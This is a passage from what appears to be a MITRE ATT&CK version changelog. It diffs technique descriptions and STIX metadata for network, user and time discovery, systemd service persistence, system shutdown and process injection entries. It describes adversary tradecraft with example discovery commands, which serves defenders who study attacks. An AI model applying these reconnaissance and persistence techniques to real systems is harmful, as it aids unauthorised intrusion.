Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Trellix Rnasomhouse 2024', 'description': 'Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.', 'url': 'https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/'} |
| x_mitre_platforms | | ESXi |
[T1049] System Network Connections Discovery
Current version: 2.5
Version changed from: 2.4 → 2.5
|
|
|---|
| t | Adversaries may attempt to get a listing of network connecti | t | Adversaries may attempt to get a listing of network connecti |
| ons to or from the compromised system they are currently acc | | ons to or from the compromised system they are currently acc |
| essing or from remote systems by querying for information ov | | essing or from remote systems by querying for information ov |
| er the network. An adversary who gains access to a system | | er the network. An adversary who gains access to a system |
| that is part of a cloud-based environment may map out Virtua | | that is part of a cloud-based environment may map out Virtua |
| l Private Clouds or Virtual Networks in order to determine w | | l Private Clouds or Virtual Networks in order to determine w |
| hat systems and services are connected. The actions performe | | hat systems and services are connected. The actions performe |
| d are likely the same types of discovery techniques dependin | | d are likely the same types of discovery techniques dependin |
| g on the operating system, but the resulting information may | | g on the operating system, but the resulting information may |
| include details about the networked cloud environment relev | | include details about the networked cloud environment relev |
| ant to the adversary's goals. Cloud providers may have diffe | | ant to the adversary's goals. Cloud providers may have diffe |
| rent ways in which their virtual networks operate.(Citation: | | rent ways in which their virtual networks operate.(Citation: |
| Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net | | Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net |
| work Overview)(Citation: Google VPC Overview) Similarly, adv | | work Overview)(Citation: Google VPC Overview) Similarly, adv |
| ersaries who gain access to network devices may also perform | | ersaries who gain access to network devices may also perform |
| similar discovery activities to gather information about co | | similar discovery activities to gather information about co |
| nnected systems and services. Utilities and commands that a | | nnected systems and services. Utilities and commands that a |
| cquire this information include [netstat](https://attack.mit | | cquire this information include [netstat](https://attack.mit |
| re.org/software/S0104), "net use," and "net session" with [N | | re.org/software/S0104), "net use," and "net session" with [N |
| et](https://attack.mitre.org/software/S0039). In Mac and Lin | | et](https://attack.mitre.org/software/S0039). In Mac and Lin |
| ux, [netstat](https://attack.mitre.org/software/S0104) and < | | ux, [netstat](https://attack.mitre.org/software/S0104) and < |
| code>lsof</code> can be used to list current connections. <c | | code>lsof</code> can be used to list current connections. <c |
| ode>who -a</code> and <code>w</code> can be used to show whi | | ode>who -a</code> and <code>w</code> can be used to show whi |
| ch users are currently logged in, similar to "net session". | | ch users are currently logged in, similar to "net session". |
| Additionally, built-in features native to network devices an | | Additionally, built-in features native to network devices an |
| d [Network Device CLI](https://attack.mitre.org/techniques/T | | d [Network Device CLI](https://attack.mitre.org/techniques/T |
| 1059/008) may be used (e.g. <code>show ip sockets</code>, <c | | 1059/008) may be used (e.g. <code>show ip sockets</code>, <c |
| ode>show tcp brief</code>).(Citation: US-CERT-TA18-106A) | | ode>show tcp brief</code>).(Citation: US-CERT-TA18-106A) On |
| | | ESXi servers, the command `esxi network ip connection list` |
| | | can be used to list active network connections.(Citation: Sy |
| | | gnia ESXi Ransomware 2025) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-06 22:35:34.231000+00:00 | 2025-04-15 19:58:45.496000+00:00 |
| description | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A) On ESXi servers, the command `esxi network ip connection list` can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.4 | 2.5 |
| x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
| x_mitre_platforms | | ESXi |
[T1033] System Owner/User Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-29 19:50:06.736000+00:00 | 2025-04-15 19:58:02.301000+00:00 |
| x_mitre_version | 1.5 | 1.6 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1216] System Script Proxy Execution
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-18 14:43:46.045000+00:00 | 2025-04-16 20:37:23.298000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.0 | 2.1 |
[T1569] System Services
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-20 19:55:40.527000+00:00 | 2025-04-15 19:59:10.127000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1529] System Shutdown/Reboot
Current version: 1.4
Version changed from: 1.3 → 1.4
|
|
|---|
| t | Adversaries may shutdown/reboot systems to interrupt access | t | Adversaries may shutdown/reboot systems to interrupt access |
| to, or aid in the destruction of, those systems. Operating s | | to, or aid in the destruction of, those systems. Operating s |
| ystems may contain commands to initiate a shutdown/reboot of | | ystems may contain commands to initiate a shutdown/reboot of |
| a machine or network device. In some cases, these commands | | a machine or network device. In some cases, these commands |
| may also be used to initiate a shutdown/reboot of a remote c | | may also be used to initiate a shutdown/reboot of a remote c |
| omputer or network device via [Network Device CLI](https://a | | omputer or network device via [Network Device CLI](https://a |
| ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co | | ttack.mitre.org/techniques/T1059/008) (e.g. <code>reload</co |
| de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert | | de>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert |
| _TA18_106A) Shutting down or rebooting systems may disrupt | | _TA18_106A) They may also include shutdown/reboot of a virtu |
| access to computer resources for legitimate users while also | | al machine via hypervisor / cloud consoles or command line t |
| impeding incident response/recovery. Adversaries may attem | | ools. Shutting down or rebooting systems may disrupt access |
| pt to shutdown/reboot a system after impacting it in other w | | to computer resources for legitimate users while also imped |
| ays, such as [Disk Structure Wipe](https://attack.mitre.org/ | | ing incident response/recovery. Adversaries may attempt to |
| techniques/T1561/002) or [Inhibit System Recovery](https://a | | shutdown/reboot a system after impacting it in other ways, s |
| ttack.mitre.org/techniques/T1490), to hasten the intended ef | | uch as [Disk Structure Wipe](https://attack.mitre.org/techni |
| fects on system availability.(Citation: Talos Nyetya June 20 | | ques/T1561/002) or [Inhibit System Recovery](https://attack. |
| 17)(Citation: Talos Olympic Destroyer 2018) | | mitre.org/techniques/T1490), to hasten the intended effects |
| | | on system availability.(Citation: Talos Nyetya June 2017)(Ci |
| | | tation: Talos Olympic Destroyer 2018) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 20:45:22.531000+00:00 | 2025-04-15 19:59:24.950000+00:00 |
| description | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A) They may also include shutdown/reboot of a virtual machine via hypervisor / cloud consoles or command line tools.
Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.
Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | Janantha Marasinghe |
| x_mitre_platforms | | ESXi |
[T1124] System Time Discovery
Current version: 1.5
Version changed from: 1.4 → 1.5
|
|
|---|
| t | An adversary may gather the system time and/or time zone set | t | An adversary may gather the system time and/or time zone set |
| tings from a local or remote system. The system time is set | | tings from a local or remote system. The system time is set |
| and stored by services, such as the Windows Time Service on | | and stored by services, such as the Windows Time Service on |
| Windows or <code>systemsetup</code> on macOS.(Citation: MSDN | | Windows or <code>systemsetup</code> on macOS.(Citation: MSDN |
| System Time)(Citation: Technet Windows Time Service)(Citati | | System Time)(Citation: Technet Windows Time Service)(Citati |
| on: systemsetup mac time) These time settings may also be sy | | on: systemsetup mac time) These time settings may also be sy |
| nchronized between systems and services in an enterprise net | | nchronized between systems and services in an enterprise net |
| work, typically accomplished with a network time server with | | work, typically accomplished with a network time server with |
| in a domain.(Citation: Mac Time Sync)(Citation: linux system | | in a domain.(Citation: Mac Time Sync)(Citation: linux system |
| time) System time information may be gathered in a number | | time) System time information may be gathered in a number |
| of ways, such as with [Net](https://attack.mitre.org/softwar | | of ways, such as with [Net](https://attack.mitre.org/softwar |
| e/S0039) on Windows by performing <code>net time \\hostname< | | e/S0039) on Windows by performing <code>net time \\hostname< |
| /code> to gather the system time on a remote system. The vic | | /code> to gather the system time on a remote system. The vic |
| tim's time zone may also be inferred from the current system | | tim's time zone may also be inferred from the current system |
| time or gathered by using <code>w32tm /tz</code>.(Citation: | | time or gathered by using <code>w32tm /tz</code>.(Citation: |
| Technet Windows Time Service) In addition, adversaries can | | Technet Windows Time Service) In addition, adversaries can |
| discover device uptime through functions such as <code>GetTi | | discover device uptime through functions such as <code>GetTi |
| ckCount()</code> to determine how long it has been since the | | ckCount()</code> to determine how long it has been since the |
| system booted up.(Citation: Virtualization/Sandbox Evasion) | | system booted up.(Citation: Virtualization/Sandbox Evasion) |
| On network devices, [Network Device CLI](https://attack.mi | | On network devices, [Network Device CLI](https://attack.mi |
| tre.org/techniques/T1059/008) commands such as `show clock d | | tre.org/techniques/T1059/008) commands such as `show clock d |
| etail` can be used to see the current time configuration.(Ci | | etail` can be used to see the current time configuration.(Ci |
| tation: show_clock_detail_cisco_cmd) In addition, system ca | | tation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcl |
| lls – such as <code>time()</code> – have been used to collec | | i system clock get` can be used for the same purpose. In ad |
| t the current time on Linux devices.(Citation: MAGNET GOBLIN | | dition, system calls – such as <code>time()</code> – have be |
| ) On macOS systems, adversaries may use commands such as <co | | en used to collect the current time on Linux devices.(Citati |
| de>systemsetup -gettimezone</code> or <code>timeIntervalSinc | | on: MAGNET GOBLIN) On macOS systems, adversaries may use com |
| eNow</code> to gather current time zone information or curre | | mands such as <code>systemsetup -gettimezone</code> or <code |
| nt date and time.(Citation: System Information Discovery Tec | | >timeIntervalSinceNow</code> to gather current time zone inf |
| hnique)(Citation: ESET DazzleSpy Jan 2022) This information | | ormation or current date and time.(Citation: System Informat |
| could be useful for performing other techniques, such as ex | | ion Discovery Technique)(Citation: ESET DazzleSpy Jan 2022) |
| ecuting a file with a [Scheduled Task/Job](https://attack.mi | | This information could be useful for performing other techn |
| tre.org/techniques/T1053)(Citation: RSA EU12 They're Inside) | | iques, such as executing a file with a [Scheduled Task/Job]( |
| , or to discover locality information based on time zone to | | https://attack.mitre.org/techniques/T1053)(Citation: RSA EU1 |
| assist in victim targeting (i.e. [System Location Discovery] | | 2 They're Inside), or to discover locality information based |
| (https://attack.mitre.org/techniques/T1614)). Adversaries ma | | on time zone to assist in victim targeting (i.e. [System Lo |
| y also use knowledge of system time as part of a time bomb, | | cation Discovery](https://attack.mitre.org/techniques/T1614) |
| or delaying execution until a specified date/time.(Citation: | | ). Adversaries may also use knowledge of system time as part |
| AnyRun TimeBomb) | | of a time bomb, or delaying execution until a specified dat |
| | | e/time.(Citation: AnyRun TimeBomb) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:50:15.929000+00:00 | 2025-04-15 19:59:21.176000+00:00 |
| description | An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)
In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) | An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or systemsetup on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)
System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.(Citation: Technet Windows Time Service) In addition, adversaries can discover device uptime through functions such as GetTickCount() to determine how long it has been since the system booted up.(Citation: Virtualization/Sandbox Evasion)
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show clock detail` can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd) On ESXi servers, `esxcli system clock get` can be used for the same purpose.
In addition, system calls – such as time() – have been used to collect the current time on Linux devices.(Citation: MAGNET GOBLIN) On macOS systems, adversaries may use commands such as systemsetup -gettimezone or timeIntervalSinceNow to gather current time zone information or current date and time.(Citation: System Information Discovery Technique)(Citation: ESET DazzleSpy Jan 2022)
This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) |
| x_mitre_version | 1.4 | 1.5 |
| x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1543.002] Create or Modify System Process: Systemd Service
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | Adversaries may create or modify systemd services to repeate | t | Adversaries may create or modify systemd services to repeate |
| dly execute malicious payloads as part of persistence. Syste | | dly execute malicious payloads as part of persistence. Syste |
| md is a system and service manager commonly used for managin | | md is a system and service manager commonly used for managin |
| g background daemon processes (also known as services) and o | | g background daemon processes (also known as services) and o |
| ther system resources.(Citation: Linux man-pages: systemd Ja | | ther system resources.(Citation: Linux man-pages: systemd Ja |
| nuary 2014) Systemd is the default initialization (init) sys | | nuary 2014) Systemd is the default initialization (init) sys |
| tem on many Linux distributions replacing legacy init system | | tem on many Linux distributions replacing legacy init system |
| s, including SysVinit and Upstart, while remaining backwards | | s, including SysVinit and Upstart, while remaining backwards |
| compatible. Systemd utilizes unit configuration files wi | | compatible. Systemd utilizes unit configuration files wi |
| th the `.service` file extension to encode information about | | th the `.service` file extension to encode information about |
| a service's process. By default, system level unit files ar | | a service's process. By default, system level unit files ar |
| e stored in the `/systemd/system` directory of the root owne | | e stored in the `/systemd/system` directory of the root owne |
| d directories (`/`). User level unit files are stored in the | | d directories (`/`). User level unit files are stored in the |
| `/systemd/user` directories of the user owned directories ( | | `/systemd/user` directories of the user owned directories ( |
| `$HOME`).(Citation: lambert systemd 2022) Inside the `.ser | | `$HOME`).(Citation: lambert systemd 2022) Inside the `.ser |
| vice` unit files, the following directives are used to execu | | vice` unit files, the following directives are used to execu |
| te commands:(Citation: freedesktop systemd.service) * `Ex | | te commands:(Citation: freedesktop systemd.service) * `Ex |
| ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe | | ecStart`, `ExecStartPre`, and `ExecStartPost` directives exe |
| cute when a service is started manually by `systemctl` or on | | cute when a service is started manually by `systemctl` or on |
| system start if the service is set to automatically start. | | system start if the service is set to automatically start. |
| * `ExecReload` directive executes when a service restarts. | | * `ExecReload` directive executes when a service restarts. |
| * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e | | * `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives e |
| xecute when a service is stopped. Adversaries have create | | xecute when a service is stopped. Adversaries have create |
| d new service files, altered the commands a `.service` file’ | | d new service files, altered the commands a `.service` file’ |
| s directive executes, and modified the user directive a `.se | | s directive executes, and modified the user directive a `.se |
| rvice` file executes as, which could result in privilege esc | | rvice` file executes as, which could result in privilege esc |
| alation. Adversaries may also place symbolic links in these | | alation. Adversaries may also place symbolic links in these |
| directories, enabling systemd to find these payloads regardl | | directories, enabling systemd to find these payloads regardl |
| ess of where they reside on the filesystem.(Citation: Anomal | | ess of where they reside on the filesystem.(Citation: Anomal |
| i Rocke March 2019)(Citation: airwalk backdoor unix systems) | | i Rocke March 2019)(Citation: airwalk backdoor unix systems) |
| (Citation: Rapid7 Service Persistence 22JUNE2016) The .ser | | (Citation: Rapid7 Service Persistence 22JUNE2016) The `.se |
| vice file’s User directive can be used to run service as a s | | rvice` file’s User directive can be used to run service as a |
| pecific user, which could result in privilege escalation bas | | specific user, which could result in privilege escalation b |
| ed on specific user/group permissions. | | ased on specific user/group permissions. Systemd services |
| | | can be created via systemd generators, which support the dyn |
| | | amic generation of unit files. Systemd generators are small |
| | | executables that run during boot or configuration reloads to |
| | | dynamically create or modify systemd unit files by converti |
| | | ng non-native configurations into services, symlinks, or dro |
| | | p-ins (i.e., [Boot or Logon Initialization Scripts](https:// |
| | | attack.mitre.org/techniques/T1037)).(Citation: Elastic Secur |
| | | ity Labs Linux Persistence 2024)(Citation: Pepe Berba System |
| | | d 2022) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-15 14:19:22.282000+00:00 | 2025-04-15 19:59:14.487000+00:00 |
| description | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)
The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. | Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022)
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts.
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016)
The `.service` file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
Systemd services can be created via systemd generators, which support the dynamic generation of unit files. Systemd generators are small executables that run during boot or configuration reloads to dynamically create or modify systemd unit files by converting non-native configurations into services, symlinks, or drop-ins (i.e., [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037)).(Citation: Elastic Security Labs Linux Persistence 2024)(Citation: Pepe Berba Systemd 2022) |
| x_mitre_version | 1.5 | 1.6 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Pepe Berba Systemd 2022', 'description': 'Pepe Berba. (2022, February 7). Hunting for Persistence in Linux (Part 5): Systemd Generators. Retrieved April 8, 2025.', 'url': 'https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/'} |
| external_references | | {'source_name': 'Elastic Security Labs Linux Persistence 2024', 'description': 'Ruben Groenewoud. (2024, August 20). Linux Detection Engineering - A primer on persistence mechanisms. Retrieved March 18, 2025.', 'url': 'https://www.elastic.co/security-labs/primer-on-persistence-mechanisms'} |
| x_mitre_contributors | | Ruben Groenewoud (@RFGroenewoud) |
[T1053.006] Scheduled Task/Job: Systemd Timers
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'root'] | |
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:42:51.536000+00:00 | 2025-04-15 19:58:55.648000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1542.005] Pre-OS Boot: TFTP Boot
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-22 16:35:53.806000+00:00 | 2025-04-15 19:58:15.890000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_platforms[0] | Network | Network Devices |
[T1080] Taint Shared Content
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Access to shared folders and content with write permissions'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:07:36.903000+00:00 | 2025-04-15 19:58:14.334000+00:00 |
| x_mitre_version | 1.5 | 1.6 |
[T1221] Template Injection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Static File Analysis'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-12 18:16:56.176000+00:00 | 2025-04-15 19:59:13.447000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1055.003] Process Injection: Thread Execution Hijacking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 12:22:50.800000+00:00 | 2025-04-15 19:58:26.012000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1055.005] Process Injection: Thread Local Storage
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
